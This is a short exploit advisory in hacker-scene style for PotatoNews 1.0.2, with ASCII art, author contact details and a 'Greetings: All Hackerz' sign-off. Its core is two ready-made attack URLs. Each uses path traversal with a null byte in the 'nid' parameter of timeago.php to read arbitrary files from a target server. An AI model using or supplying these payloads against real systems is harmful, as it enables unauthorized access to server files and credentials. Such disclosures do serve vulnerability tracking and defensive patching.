PotatoNews version 1.0.2 suffers from a local file inclusion vulnerability.
2c7eb08e6233c03b3a313e2143e976d73e52efc25e5b15613643fc0a73a4693f
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
PotatoNews 1.0.2 Multiple Local File Include Vulnerability
Script: http://code.google.com/p/potato-news/
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
//------------------------------------------------------------------+
http://[target]/[path]/newcopy/timeago.php?nid=../../../../../../../[file]%00
http://[target]/[path]/update/timeago.php?nid=../../../../../../../[file]%00
//------------------------------------------------------------------+
Greetings: All Hackerz